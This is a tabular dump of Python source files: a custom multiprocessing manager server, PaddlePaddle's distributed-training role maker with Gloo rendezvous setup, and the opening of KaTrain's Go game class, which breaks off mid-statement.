source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
managers.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import multiprocessing.managers
from multiprocessing.managers import SyncManager as _SyncManager
import threading
__author__ = 'yasu'
class ManagerServer(multiprocessing.managers.Server):
    """Single-connection manager server.

    Subclass of the (undocumented) ``multiprocessing.managers.Server`` that
    handles one client connection per ``dispatch()`` call and lets shared
    objects be registered under caller-chosen idents so the same object can
    be looked up again instead of re-created.
    """
    # Manager class this server is paired with.
    manager = multiprocessing.managers.SyncManager

    @property
    def socket(self):
        # Expose the raw listening socket from the listener internals
        # (e.g. so the caller can select() on it).
        return self.listener._listener._socket

    def dispatch(self, sock):
        '''
        Run the server forever

        NOTE(review): despite the wording above, each call accepts a single
        pending connection and handles its requests on a daemon thread; the
        caller is expected to invoke this repeatedly.
        '''
        # Make this server discoverable from proxies created in-process.
        multiprocessing.managers.current_process()._manager_server = self
        c = self.listener.accept()
        t = threading.Thread(target=self.handle_request, args=(c, ))
        t.daemon = True
        t.start()

    def server_close(self):
        # Intentionally a no-op: the listener lifetime is managed by the caller.
        pass

    def create(self, c, typeid, *args, **kwds):
        '''
        Create a new shared object and return its id

        Extends the stock implementation with an optional ``ident`` keyword:
        when given, the object is registered as ``"<typeid>_<ident>"`` and
        later calls with the same ident reuse the already-created object.
        '''
        self.mutex.acquire()
        try:
            ident = kwds.pop("ident", None)
            if ident is not None:
                ident = "%s_%s" % (typeid, ident)
            callable, exposed, method_to_typeid, proxytype = \
                self.registry[typeid]
            if ident is None or ident not in self.id_to_obj:
                # Anonymous object or first sighting of this ident: build it
                # from the registered callable or the single positional arg.
                if callable is None:
                    assert len(args) == 1 and not kwds
                    obj = args[0]
                else:
                    obj = callable(*args, **kwds)
                if not ident:
                    ident = '%x' % id(obj)  # convert to string because xmlrpclib
            else:
                # Reuse the previously registered object for this ident.
                obj = self.id_to_obj[ident][0]
            if exposed is None:
                exposed = multiprocessing.managers.public_methods(obj)
            if method_to_typeid is not None:
                assert type(method_to_typeid) is dict
                exposed = list(exposed) + list(method_to_typeid)
            # only has 32 bit signed integers
            multiprocessing.managers.util.debug('%r callable returned object with id %r', typeid, ident)
            self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
            if ident not in self.id_to_refcount:
                self.id_to_refcount[ident] = 0
            # increment the reference count immediately, to avoid
            # this object being garbage collected before a Proxy
            # object for it can be created. The caller of create()
            # is responsible for doing a decref once the Proxy object
            # has been created.
            self.incref(c, ident)
            return ident, tuple(exposed)
        finally:
            self.mutex.release()
class SyncManager(_SyncManager):
    """SyncManager whose server side is the single-connection ManagerServer."""
    # Server implementation instantiated by get_server().
    _Server = ManagerServer

    def get_server(self):
        '''
        Return server object with serve_forever() method and address attribute

        Mirrors the stdlib implementation but instantiates our _Server
        subclass instead of the stock multiprocessing Server.
        '''
        assert self._state.value == multiprocessing.managers.State.INITIAL
        return self._Server(self._registry, self._address,
                            self._authkey, self._serializer)
|
role_maker.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of Role Makers."""
import os
import time
import numpy as np
import warnings
from multiprocessing import Process, Manager
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.base.private_helper_function import wait_server_ready
class Role:
    # Roles a distributed-training process can take.
    WORKER = 1
    SERVER = 2
    HETER_WORKER = 3
    ALL = 4  # pseudo-role covering workers and servers together
class Gloo(object):
"""
Gloo is a universal class for barrier and collective communication
"""
    class RENDEZVOUS:
        # Supported rendezvous (store) backends for gloo initialization.
        HDFS = 1
        FILE = 2
        HTTP = 3
    def __init__(self):
        # communicators per world; populated by the _init_* helpers
        self._worker_comm = None
        self._server_comm = None
        self._nodes_comm = None
        # world names accepted by barrier()/all_reduce()/all_gather()
        self._comm_world = ["worker", "server", "all"]
        self._err_init = "gloo is not initialized, will not communicator with other nodes"
        self._err_type = "gloo initialized error, please check arguments"
        self._err_world = "argument error, comm_world must in {}".format(
            self._comm_world)
        self._is_initialized = False
        self._init_timeout_seconds = 3600
        self._run_timeout_seconds = 9999999
        self._rendezvous = None
        self._role = None
        self._iface = None
        self._role_id = -1
        self._worker_num = -1
        self._server_num = -1
        self._need_init_all = False
def init(self,
rendezvous,
role,
role_id,
worker_num,
server_num,
need_init_all=False,
kwargs=None):
self._rendezvous = rendezvous
self._role = role
self._role_id = role_id
self._worker_num = worker_num
self._server_num = server_num
self._need_init_all = need_init_all
self._iface = ""
self._prefix = kwargs.get("store.prefix", "")
http_server = None
if self._rendezvous == Gloo.RENDEZVOUS.HDFS:
dfs_name = kwargs.get("dfs.name", "")
dfs_ugi = kwargs.get("dfs.ugi", "")
dfs_path = kwargs.get("dfs.path", "")
if not dfs_name or not dfs_ugi or not dfs_path:
raise ValueError(self._err_type)
self._init_dfs(dfs_name, dfs_ugi, dfs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.FILE:
fs_path = kwargs.get("dfs.path", "")
if not fs_path:
raise ValueError(self._err_type)
self._init_fs(fs_path, self._prefix)
elif self._rendezvous == Gloo.RENDEZVOUS.HTTP:
ip = kwargs.get("http.host", "")
port = kwargs.get("http.port", "")
start_http_server = kwargs.get("start_http_server", False)
http_server_d = kwargs.get("http_server_d")
if not ip or not port:
raise ValueError(self._err_type)
http_server = self._init_http(ip, port, self._prefix,
start_http_server, http_server_d)
else:
raise ValueError(self._err_type)
self._is_initialized = True
self._http_server = http_server
    def _init_fs(self, fs_path, prefix):
        """Build gloo communicators rendezvousing through a shared file-system path."""
        def init(rank, nodes, role):
            # Construct and bootstrap one gloo context for `role`'s world.
            gloo = fluid.core.Gloo()
            gloo.set_rank(rank)
            gloo.set_size(nodes)
            gloo.set_prefix(prefix)
            gloo.set_iface(self._iface)
            gloo.set_timeout_seconds(self._init_timeout_seconds,
                                     self._run_timeout_seconds)
            # empty name/ugi => plain file-system store rather than HDFS
            gloo.set_hdfs_store(os.path.join(fs_path, role), "", "")
            gloo.init()
            return gloo

        if self._role == Role.WORKER:
            rank, nodes = self._get_rank_nodes(Role.WORKER)
            gloo = init(rank, nodes, "WORKER")
            self._worker_comm = gloo
        else:
            rank, nodes = self._get_rank_nodes(Role.SERVER)
            gloo = init(rank, nodes, "SERVER")
            self._server_comm = gloo
        if self._need_init_all:
            rank, nodes = self._get_rank_nodes(Role.ALL)
            gloo = init(rank, nodes, "ALL")
            self._nodes_comm = gloo
    def _init_dfs(self, dfs_name, dfs_ugi, dfs_path, prefix):
        """Build gloo communicators rendezvousing through an HDFS store."""
        def init(rank, nodes, role):
            # Construct and bootstrap one gloo context for `role`'s world.
            gloo = fluid.core.Gloo()
            gloo.set_rank(rank)
            gloo.set_size(nodes)
            gloo.set_prefix(prefix)
            gloo.set_iface(self._iface)
            gloo.set_timeout_seconds(self._init_timeout_seconds,
                                     self._run_timeout_seconds)
            gloo.set_hdfs_store(os.path.join(dfs_path, role), dfs_name, dfs_ugi)
            gloo.init()
            return gloo

        if self._role == Role.WORKER:
            rank, nodes = self._get_rank_nodes(Role.WORKER)
            gloo = init(rank, nodes, "WORKER")
            self._worker_comm = gloo
        else:
            rank, nodes = self._get_rank_nodes(Role.SERVER)
            gloo = init(rank, nodes, "SERVER")
            self._server_comm = gloo
        if self._need_init_all:
            rank, nodes = self._get_rank_nodes(Role.ALL)
            gloo = init(rank, nodes, "ALL")
            self._nodes_comm = gloo
    def _init_http(self, ip, port, prefix, start_http_server, http_server_d):
        """Build gloo communicators rendezvousing through a KV HTTP server.

        NOTE(review): this method returns None, yet init() stores its result
        in self._http_server -- presumably the KV-server child Process was
        meant to be returned; confirm before relying on self._http_server.
        """
        def __start_kv_server(http_server_d, size_d):
            # Runs in the child process: serve the KV store until the shared
            # "running" flag is cleared by the parent.
            from paddle.distributed.fleet.utils.http_server import KVServer
            http_server = KVServer(port, size_d)
            http_server.start()
            wait_seconds = 5
            while http_server_d.get("running", False):
                time.sleep(wait_seconds)
            http_server.stop()

        def init_kv_server(http_server_d):
            # expected participant counts per world
            size_d = {
                "trainer": self._worker_num,
                "pserver": self._server_num,
                "all": self._worker_num + self._server_num
            }
            http_server_d["running"] = True
            # child process for http server
            _http_server = Process(
                target=__start_kv_server, args=(http_server_d, size_d))
            _http_server.daemon = True
            # set running status to True
            # start child process
            _http_server.start()
            return _http_server

        def init(rank, nodes, role):
            gloo = fluid.core.Gloo()
            gloo.set_rank(rank)
            gloo.set_size(nodes)
            gloo.set_prefix(prefix)
            gloo.set_iface(self._iface)
            gloo.set_timeout_seconds(self._init_timeout_seconds,
                                     self._run_timeout_seconds)
            gloo.set_http_store(ip, port, role)
            # block until the KV server endpoint accepts connections
            ep = ":".join([ip, str(port)])
            wait_server_ready([ep])
            gloo.init()
            return gloo

        port = int(port)
        if start_http_server:
            http_server = init_kv_server(http_server_d)
        if self._role == Role.WORKER:
            rank, nodes = self._get_rank_nodes(Role.WORKER)
            gloo = init(rank, nodes, "WORKER")
            self._worker_comm = gloo
        else:
            rank, nodes = self._get_rank_nodes(Role.SERVER)
            gloo = init(rank, nodes, "SERVER")
            self._server_comm = gloo
        if self._need_init_all:
            rank, nodes = self._get_rank_nodes(Role.ALL)
            gloo = init(rank, nodes, "ALL")
            self._nodes_comm = gloo
        if start_http_server:
            # rendezvous finished: ask the KV-server child to shut down
            http_server_d["running"] = False
            http_server.join()
def _get_rank_nodes(self, role):
nodes = 0
rank = -1
if role == Role.WORKER:
nodes = self._worker_num
rank = self._role_id
elif role == Role.SERVER:
nodes = self._server_num
rank = self._role_id
elif role == Role.ALL:
nodes = self._worker_num + self._server_num
if self._role == Role.WORKER:
rank = self._role_id
else:
rank = self._worker_num + self._role_id
else:
ValueError(self._err_type)
return rank, nodes
def __get_default_iface(self):
"""
get default physical interface
"""
default1 = self.__get_default_iface_from_gateway()
default2 = self.__get_default_iface_from_interfaces()
return default2 if default1 == "lo" else default1
def __get_default_iface_from_gateway(self):
"""
get default physical interface
"""
res = os.popen("route -A inet").read().strip().split("\n")
gateway_idx = None
iface_idx = None
for item in res:
item = item.split()
if "Gateway" in item and "Iface" in item:
gateway_idx = item.index("Gateway")
iface_idx = item.index("Iface")
elif gateway_idx != None and iface_idx != None:
gateway = None
if len(item) > gateway_idx:
gateway = item[gateway_idx]
if gateway and gateway != '*' and gateway != "0.0.0.0" and len(
item) > iface_idx:
return item[iface_idx]
return "lo"
    def __get_default_iface_from_interfaces(self):
        """
        get default physical interface

        Scans `ip -f inet addr` output (every third line is an interface
        header) and returns the first BROADCAST-capable interface, else "lo".
        """
        res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
            "\n")
        for item in res:
            if "BROADCAST" in item:
                return item.split(":")[1].strip()
        return "lo"
def barrier(self, comm_world):
"""
dummy barrier, do nothing
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
dummy all gather, do nothing
Args:
obj(any): obj to do all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
class RoleMakerBase(object):
    """
    RoleMakerBase is a base class for assigning a role to current process
    in distributed training.
    A paddle developer can implement RoleMakerBase to design a role maker
    for worker or pserver assignment.
    """

    def __init__(self):
        self._worker_endpoints = []
        self._server_endpoints = []
        self._role_is_generated = False
        self._role = None
        self._current_id = -1
        # for heter parameter server mode
        self._heter_trainer_endpoints = []
        self._heter_trainer_device = "CPU"
        self._is_heter_parameter_server_mode = False

    def _is_worker(self):
        """
        return is_worker() of current process
        """
        raise NotImplementedError("Please implement this method in child class")

    def _is_server(self):
        """
        return is_server() of current process
        """
        raise NotImplementedError("Please implement this method in child class")

    def _is_first_worker(self):
        """
        Check whether the node is the first instance of worker.
        Returns:
            bool: True if this is the first node of worker,
            False if not.
        """
        raise NotImplementedError("Please implement this method in child class")

    def _worker_num(self):
        """
        Get current total worker number.
        Returns:
            int: worker number
        """
        raise NotImplementedError("Please implement this method in child class")

    def _server_num(self):
        """
        Get current total server number.
        Returns:
            int: server number
        """
        raise NotImplementedError("Please implement this method in child class")

    def _worker_index(self):
        """
        Get current worker id.
        Returns:
            int: node id
        """
        raise NotImplementedError("Please implement this method in child class")

    def _server_index(self):
        """
        Get current server id.
        Returns:
            int: node id
        """
        raise NotImplementedError("Please implement this method in child class")

    def _role_id(self):
        """
        Get current id.
        Returns:
            int: node id
        """
        raise NotImplementedError("Please implement this method in child class")

    def _node_num(self):
        """
        Get the training node number
        Returns:
            int: node num
        """
        raise NotImplementedError("Please implement this method in child class")

    def _get_trainer_endpoints(self):
        """
        return trainer endpoints
        """
        return self._worker_endpoints

    def _get_pserver_endpoints(self):
        """
        return pserver endpoints
        """
        return self._server_endpoints

    def to_string(self):
        """Human-readable summary of the current role assignment."""
        return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
            self._role, self._current_id, self._worker_endpoints,
            self._server_endpoints)

    def _all_gather(self, input, comm_world="worker"):
        # no-op placeholder; real communication is provided by subclasses
        print("warning: RoleMakerBase does not have all gather worker.")
        return None

    def _all_reduce(self, input, mode="sum", comm_world="worker"):
        """
        Args:
            input(list/numpy.array): array of one dim
            output(list/numpy.array): array of one dim
            mode(str): "sum" or "min" or "max"
        """
        # no-op placeholder; real communication is provided by subclasses
        print("warning: RoleMakerBase does not have all reduce worker.")
        return None

    def _barrier(self, comm_world):
        """
        barrier between trainers if current role is TRAINER
        """
        # no-op placeholder; real synchronization is provided by subclasses
        print("warning: RoleMakerBase does not have barrier worker.")

    def _is_heter_worker(self):
        """
        Return is_heter_worker() of current process
        """
        warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
        return False

    def _heter_worker_num(self):
        """
        Get current total heter-worker number.
        Returns:
            int: heter_worker number
        """
        warnings.warn(
            "RoleMakerBase does not have function: _heter_worker_num.")
        return 0

    def _get_heter_worker_endpoints(self):
        """
        Returns:
            string: all heter_trainers'endpoints
        """
        assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
        return self._heter_trainer_endpoints

    def _get_heter_worker_endpoint(self):
        """
        Returns:
            str: corresponding heter_trainer's endpoint
            e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
            then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
            and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
        """
        assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
        # pair cpu-trainers with gpu-trainers round-robin by trainer id
        return self._heter_trainer_endpoints[(self._current_id) %
                                             self._heter_worker_num()]
class PaddleCloudRoleMaker(RoleMakerBase):
    def __init__(self, is_collective=False, **kwargs):
        """Role maker driven by PaddleCloud environment variables.

        Args:
            is_collective: True for collective training, False for
                parameter-server training.
            **kwargs: stored for use by subclasses (e.g. UserDefinedRoleMaker).
        """
        super(PaddleCloudRoleMaker, self).__init__()
        self._is_collective = is_collective
        self._non_distributed = False
        self._kwargs = kwargs
        self._role_is_generated = False
        self._server_endpoints = []
        self._worker_endpoints = []
        self._gloo = Gloo()  # gloo instance
    def _barrier(self, comm_world):
        """Barrier across `comm_world` ("worker", "server" or "all") via gloo."""
        self._gloo.barrier(comm_world)
    def _all_gather(self, input, comm_world="worker"):
        """All-gather `input` across `comm_world` via gloo."""
        return self._gloo.all_gather(input, comm_world)
    def _all_reduce(self, input, mode="sum", comm_world="worker"):
        """All-reduce `input` with `mode` across `comm_world` via gloo."""
        return self._gloo.all_reduce(input, mode, comm_world)
    def _is_worker(self):
        """
        whether current process is worker
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._role == Role.WORKER
    def _is_server(self):
        """
        whether current process is server
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._role == Role.SERVER
    def _is_first_worker(self):
        """
        whether current process is worker of rank 0
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._role == Role.WORKER and self._current_id == 0
    def _worker_index(self):
        """
        get index of current worker
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._current_id
    def _server_index(self):
        """
        get index of current server
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._current_id
    def _role_id(self):
        """
        get index of current node
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._current_id
    def _worker_num(self):
        """
        return the current number of workers
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._trainers_num
    def _server_num(self):
        """
        return the current number of server
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return len(self._get_pserver_endpoints(
        )) if self._get_pserver_endpoints() is not None else 0
    def _node_num(self):
        """
        return the training node number
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._nodes_num
    def _get_trainer_endpoints(self):
        """
        get endpoint of all trainers
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._worker_endpoints
    def _get_pserver_endpoints(self):
        """
        get endpoint of all pservers
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._server_endpoints
    def _is_non_distributed(self):
        """
        Return True if indispensable environment for fleetrun is not found
        (use python-run to launch fleet-code directly)
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._non_distributed
    def _heter_worker_num(self):
        """
        get heter worker nums
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._heter_trainers_num
    def _is_heter_worker(self):
        """
        whether current process is heter worker
        """
        # role info is resolved lazily from the environment on first access
        if not self._role_is_generated:
            self._generate_role()
        return self._role == Role.HETER_WORKER
def _ps_env(self):
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST", None)
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS", None)
if self._worker_endpoints != None:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = os.getenv("PADDLE_TRAINERS_NUM", None)
if trainers_num == None:
raise ValueError(
"Can not find PADDLE_TRAINERS_NUM, please check your environment."
)
trainers_num = int(trainers_num)
training_role = os.getenv("TRAINING_ROLE", None)
if training_role == None:
raise ValueError(
"Can not find TRAINING_ROLE, please check your environment.")
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv("PADDLE_HETER_TRAINER_IP_PORT_LIST",
"")
if heter_trainer_eplist != "":
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = os.getenv("PADDLE_TRAINER_ID", None)
if current_id == None:
raise ValueError(
"Can not find PADDLE_TRAINER_ID, please check your environment."
)
current_id = int(current_id)
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.getenv("PADDLE_PORT", None)
if port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
ip = os.getenv("POD_IP", None)
if ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_port = os.getenv("PADDLE_PORT", None)
if cur_port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
cur_ip = os.getenv("POD_IP", None)
if cur_ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
    def _collective_env(self):
        """Resolve role/endpoints for collective training from env variables.

        Falls back to single-process 127.0.0.1:6170 when
        PADDLE_TRAINER_ENDPOINTS is absent.
        """
        self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
        self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
        # collective mode only supports the TRAINER role
        assert (self._training_role == "TRAINER")
        self._role = Role.WORKER
        self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
        self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
        if self._worker_endpoints is None:
            # back to non_distributed execution.
            self._worker_endpoints = "127.0.0.1:6170"
            self._cur_endpoint = self._worker_endpoints
            self._non_distributed = True
        self._worker_endpoints = self._worker_endpoints.split(",")
        self._trainers_num = len(self._worker_endpoints)
        # node count = number of distinct host IPs among workers
        self._nodes_num = len(
            set([x.split(':')[0] for x in self._worker_endpoints]))
    def _gloo_init(self):
        """Initialize the gloo instance from PADDLE_* environment variables.

        Skipped entirely unless PADDLE_WITH_GLOO is 1 (trainer barrier)
        or 2 (all barrier).
        """
        # PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
        use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
        if use_gloo not in [1, 2]:
            return
        # PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
        rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
        prefix = os.getenv("SYS_JOB_ID", "")
        if rendezvous_type not in [
                Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
        ]:
            raise ValueError(self._gloo._err_type)
        need_init_all = True if use_gloo == 2 else False
        if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
            dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
            dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
            dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
            kwargs = {
                "dfs.name": dfs_name,
                "dfs.ugi": dfs_ugi,
                "dfs.path": dfs_path,
                "store.prefix": prefix,
            }
        elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
            # HTTP rendezvous: exactly one process hosts the KV server --
            # the first worker in collective mode, server 0 otherwise.
            start_http_server = False
            manager = Manager()
            http_server_d = manager.dict()
            http_server_d["running"] = False
            if self._is_collective:
                ep_rank_0 = self._worker_endpoints[0]
                if self._is_first_worker():
                    start_http_server = True
            else:
                ep_rank_0 = os.getenv("PADDLE_GLOO_HTTP_ENDPOINT", "")
                if self._server_index() == 0:
                    start_http_server = True
            ip, port = ep_rank_0.split(':')
            kwargs = {
                "http.host": ip,
                "http.port": port,
                "store.prefix": prefix,
                'start_http_server': start_http_server,
                'http_server_d': http_server_d,
            }
        else:
            dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
            kwargs = {
                "dfs.path": dfs_path,
                "store.prefix": prefix,
            }
        # NOTE: `type` here shadows the builtin; used only for the log line.
        if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
            type = "HDFS"
        elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
            type = "HTTP"
        else:
            type = "FILE"
        print("Gloo init with {}: need_init_all: {}, args: {}".format(
            type, need_init_all, kwargs))
        self._gloo.init(
            rendezvous=rendezvous_type,
            role=self._role,
            role_id=self._role_id(),
            worker_num=self._worker_num(),
            server_num=self._server_num(),
            need_init_all=need_init_all,
            kwargs=kwargs)
        if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
            # rendezvous finished: signal the KV-server child to stop
            http_server_d['running'] = False
    def _generate_role(self):
        """
        generate role for role maker

        Resolves role info once (idempotent) and, outside dygraph mode,
        also initializes gloo.
        """
        if not self._role_is_generated:
            if not self._is_collective:
                self._ps_env()
            else:
                self._collective_env()
            self._role_is_generated = True
            if not paddle.fluid.framework.in_dygraph_mode():
                self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
    """Role maker whose role info comes from constructor kwargs instead of env vars."""

    def __init__(self, is_collective=False, init_gloo=False, **kwargs):
        super(UserDefinedRoleMaker, self).__init__(
            is_collective=is_collective, init_gloo=init_gloo, **kwargs)
        self._init_gloo = init_gloo

    def _user_defined_ps_env(self):
        # Parameter-server mode: read endpoints/role/id from self._kwargs.
        self._server_endpoints = self._kwargs.get("server_endpoints")
        self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
        self._trainers_num = self._kwargs.get("worker_num", 0)
        if self._trainers_num == 0:
            # infer worker count from the endpoint list when not given
            assert (len(self._worker_endpoints) > 0)
            self._trainers_num = len(self._worker_endpoints)
        self._role = self._kwargs.get("role")
        self._current_id = self._kwargs.get("current_id")
        if self._role == Role.WORKER and len(
                self._worker_endpoints) > self._current_id:
            self._cur_endpoint = self._worker_endpoints[self._current_id]
        elif self._role == Role.SERVER:
            self._cur_endpoint = self._server_endpoints[self._current_id]
        self._nodes_num = len(
            set([x.split(':')[0] for x in self._worker_endpoints]))

    def _user_defined_collective_env(self):
        # Collective mode: every process is a worker.
        self._worker_endpoints = self._kwargs.get("worker_endpoints")
        self._current_id = self._kwargs.get("current_id")
        self._trainers_num = len(self._worker_endpoints)
        self._training_role = Role.WORKER
        self._nodes_num = len(
            set([x.split(':')[0] for x in self._worker_endpoints]))

    def _generate_role(self):
        """
        generate role for role maker

        Resolves role info once (idempotent) from the user-supplied kwargs.
        """
        if not self._role_is_generated:
            if not self._is_collective:
                self._user_defined_ps_env()
            else:
                self._user_defined_collective_env()
            self._role_is_generated = True
|
game.py | import math
import os
import re
import threading
from datetime import datetime
from typing import Dict, List, Optional, Union
from katrain.core.constants import HOMEPAGE, OUTPUT_DEBUG, OUTPUT_INFO
from katrain.core.engine import KataGoEngine
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n
from katrain.core.sgf_parser import SGF, Move
from katrain.core.utils import var_to_grid
class IllegalMoveException(Exception):
    """Raised when a move violates the rules (occupied point, ko, suicide, off-board)."""
    pass
class KaTrainSGF(SGF):
    """SGF parser whose tree nodes are KaTrain GameNode objects."""
    _NODE_CLASS = GameNode
class Game:
"""Represents a game of go, including an implementation of capture rules."""
DEFAULT_PROPERTIES = {"GM": 1, "FF": 4, "AP": f"KaTrain:{HOMEPAGE}", "CA": "UTF-8"}
    def __init__(
        self,
        katrain,
        engine: Union[Dict, KataGoEngine],
        move_tree: GameNode = None,
        analyze_fast=False,
        game_properties: Optional[Dict] = None,
    ):
        """Set up a game from an existing move tree (loaded SGF) or from
        katrain's configured defaults, then kick off background analysis of
        all nodes."""
        self.katrain = katrain
        if not isinstance(engine, Dict):
            # a single engine serves both players
            engine = {"B": engine, "W": engine}
        self.engines = engine
        self.game_id = datetime.strftime(datetime.now(), "%Y-%m-%d %H %M %S")
        if move_tree:
            self.root = move_tree
            self.komi = self.root.komi
            handicap = int(self.root.get_property("HA", 0))
            # SGF declares a handicap but has no placement stones: place them
            if handicap and not self.root.placements:
                self.place_handicap_stones(handicap)
        else:
            board_size = katrain.config("game/size")
            self.komi = katrain.config("game/komi")
            self.root = GameNode(
                properties={
                    **Game.DEFAULT_PROPERTIES,
                    **{"SZ": board_size, "KM": self.komi, "DT": self.game_id},
                    **(game_properties or {}),
                }
            )
            handicap = katrain.config("game/handicap")
            if handicap:
                self.place_handicap_stones(handicap)
        if not self.root.get_property("RU"):
            self.root.set_property("RU", katrain.config("game/rules"))
        self.set_current_node(self.root)
        threading.Thread(
